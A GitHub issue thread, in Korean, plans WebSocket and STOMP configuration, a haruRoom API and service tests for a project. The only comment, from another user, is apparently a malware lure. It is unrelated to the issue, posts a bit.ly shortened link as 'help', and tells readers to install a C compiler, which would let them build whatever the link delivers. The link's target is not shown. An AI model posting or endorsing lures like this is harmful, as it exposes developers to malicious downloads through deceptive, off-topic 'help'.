### ISSUE TITLE
[feat] webSocket 적용

### ISSUE THREAD

**Issue by Jeonghyeon178** [haruconnection-v2/Haru#20]
## 💡 구현할 기능 설명
- stomp configuration 적용
- haruRoom api 기능 구현
- 서비스단 api 테스트 코드 작성
- etc.
## ❗체크리스트
- [x] 모든 포지션의 팀원들이 이해할 수 있도록 충분한 설명을 제공하나요?
- [x] 제목 형식을 지키고 브랜치 및 라벨을 할당했나요?
- [x] 메인 브랜치에서 작업하지는 않았나요?

**Comment by aroopcodder** [comment]
I think this will help you.

https://bit.ly/4eugCty
If you don't have the c compliator, install it.(gcc or clang)
